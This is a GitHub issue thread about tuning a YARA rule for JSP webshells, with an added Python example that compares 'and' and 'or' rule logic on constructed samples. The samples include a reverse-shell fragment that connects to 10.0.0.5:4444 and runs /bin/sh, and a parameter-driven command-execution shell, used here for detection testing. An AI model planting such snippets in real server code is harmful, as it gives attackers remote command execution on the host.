Neo23x0 / signature-base

YARA signature and IOC database for my scanners and tools

Generic JSP Webshell false negative #271

Open orapic opened 1 year ago

orapic commented 1 year ago

Hi,

I stumbled upon a reverse JSP shell, and the generic rule for JSP webshells, WEBSHELL_JSP_Generic, returns a false positive due to the nature of the reverse shell.

Changing this:

and (
            any of ( $input* ) and
            any of ( $req* )
        )

to this:

and (
            any of ( $input* ) or
            any of ( $req* )
        )

solves the issue. This might apply to the other JSP rules. I don't know how many false positives that is going to give, but I think it's preferable to have false positives than false negatives.

Kind regards,
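To make the trade-off in the proposed change concrete, the following added example (written for this page, not the signature-base rule itself) emulates YARA's `any of ($set*)` semantics in Python and evaluates the `$input*`/`$req*` glue as `and` versus `or` over three constructed JSP snippets. The two string sets are hypothetical stand-ins, not the strings of WEBSHELL_JSP_Generic, and the other condition terms that the `and (` fragment joins onto are not modeled.

```python
# Added illustration, not code from the signature-base repository.
# Emulates `any of ($input*) <glue> any of ($req*)` from a generic JSP
# webshell rule to show what each boolean glue catches and misses.

# Hypothetical stand-in string sets (constructed for this example; the real
# rule's $input*/$req* strings are not reproduced here).
INPUT_STRINGS = ("getParameter(", "getInputStream(", "getReader(")
REQ_STRINGS = ("request.", "HttpServletRequest")


def any_of(strings, sample):
    """Emulate YARA's `any of ($set*)`: true if at least one string occurs."""
    return any(s in sample for s in strings)


def condition(sample, glue):
    """Evaluate `any of ($input*) <glue> any of ($req*)` for glue in {and, or}."""
    has_input = any_of(INPUT_STRINGS, sample)
    has_req = any_of(REQ_STRINGS, sample)
    if glue == "and":
        return has_input and has_req
    if glue == "or":
        return has_input or has_req
    raise ValueError(f"unsupported glue {glue!r}")


# Constructed JSP samples (shortened, not real-world files).
SAMPLES = {
    # Classic parameter-driven shell: reads attacker input from the request,
    # so both string sets fire regardless of the glue.
    "param_webshell": '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>',
    # Reverse shell: connects out and pipes a process to the socket; it never
    # touches the HttpServletRequest, so only the $input* set fires
    # (getInputStream on the Process/Socket) and `and` misses it.
    "reverse_shell": (
        '<% java.net.Socket s = new java.net.Socket("10.0.0.5", 4444);'
        ' Process p = Runtime.getRuntime().exec("/bin/sh");'
        ' java.io.InputStream pi = p.getInputStream(), si = s.getInputStream(); %>'
    ),
    # Benign page: references the request object but reads no untrusted input
    # through the $input* APIs, so only the $req* set fires and `or` flags it.
    "benign_page": '<% String u = (String) request.getAttribute("user"); out.print(u); %>',
}


def evaluate(glue):
    """Return {sample_name: matched} for the chosen boolean glue."""
    return {name: condition(src, glue) for name, src in SAMPLES.items()}


if __name__ == "__main__":
    for glue in ("and", "or"):
        print(glue, evaluate(glue))
```

With `and`, the reverse shell is a false negative; with `or`, the benign page becomes a false positive, which is the cost the maintainer's reply points at. In a real rule the remaining condition terms narrow this further, so the sample with the actual file is what decides the tuning.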

ruppde commented 1 year ago

hi,

That change would produce many false positives. Can you upload the webshell to VirusTotal and send me the hash?

Regards, Arnim